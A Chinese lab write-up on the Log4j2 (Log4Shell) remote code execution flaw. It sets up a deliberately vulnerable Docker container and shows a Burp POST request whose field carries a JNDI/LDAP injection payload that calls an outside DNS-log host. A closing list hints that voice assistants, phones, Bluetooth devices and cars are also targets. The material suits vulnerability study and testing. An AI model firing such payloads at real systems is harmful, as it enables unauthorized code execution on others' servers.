Log4j2 RCE漏洞及靶场搭建

漏洞简介

Apache Log4j2是一款Java日志框架，是Log4j 的升级版。可以控制每一条日志的输出格式。通过定义每一条日志信息的级别，能够更加细致地控制日志的生成过程。该漏洞是由于Apache Log4j2某些功能存在递归解析功能，攻击者可利用该漏洞在未授权的情况下，构造恶意数据进行远程代码执行攻击，最终获取服务器最高权限。

目前受影响的Apache Log4j2版本：
2.0 ≤ Apache Log4j <= 2.14.1

漏洞复现

在下载镜像复现之前确保，虚拟机非处于挂起状态！
在下载镜像复现之前确保，虚拟机非处于挂起状态！
在下载镜像复现之前确保，虚拟机非处于挂起状态！

感谢风炫大佬耐心解答

┌──(rootguiltyfet)-[/home/guiltyfet]
└─# docker pull registry.cn-hangzhou.aliyuncs.com/fengxuan/log4j_vuln
Using default tag: latest
latest: Pulling from fengxuan/log4j_vuln
Digest: sha256:d929cad3243483f2f3cec6b7281a02873d9e6661dc00b5f0313429c04912d71d
Status: Image is up to date for registry.cn-hangzhou.aliyuncs.com/fengxuan/log4j_vuln:latest
registry.cn-hangzhou.aliyuncs.com/fengxuan/log4j_vuln:latest

┌──(rootguiltyfet)-[/home/guiltyfet]
└─# docker run -it -d -p 8080:8080 --name log4j_vuln_container registry.cn-hangzhou.aliyuncs.com/fengxuan/log4j_vuln
8b707e3bc843cc4adc64b97a7237bf887ff6b31d5156d66a930b6b8861138a9b
                                                                                                 
┌──(rootguiltyfet)-[/home/guiltyfet]
└─# docker exec -it log4j_vuln_container /bin/bash
[root@8b707e3bc843 ansible]# /bin/bash /home/apache-tomcat-8.5.45/bin/startup.sh
Using CATALINA_BASE:   /home/apache-tomcat-8.5.45
Using CATALINA_HOME:   /home/apache-tomcat-8.5.45
Using CATALINA_TMPDIR: /home/apache-tomcat-8.5.45/temp
Using JRE_HOME:        /usr/local/jdk1.8.0_144/
Using CLASSPATH:       /home/apache-tomcat-8.5.45/bin/bootstrap.jar:/home/apache-tomcat-8.5.45/bin/tomcat-juli.jar
Tomcat started.
[root@8b707e3bc843 ansible]# 

http://127.0.0.1:8080/webstudy/hello-fengxuan

更改burp与SwitchyOmega默认端口

POST /webstudy/hello-fengxuan HTTP/1.1
Host: 127.0.0.1:8080
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Cookie: hblid=OCkAkPEOWHj8QX5o3m39N0H02BOA0I12; olfsk=olfsk8528760320823083; ECS[visit_times]=1; private_content_version=e48e945c4e066c5afa30b51edd7c4541; pma_lang=en; pma_collation_connection=utf8_unicode_ci
Upgrade-Insecure-Requests: 1
Pragma: no-cache
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Content-Length: 41

c=${jndi:ldap://bb772939.dns.1433.eu.org}

万物皆可

一.语音助手
二.手机桌面

三.某蓝牙
四.某车
于是…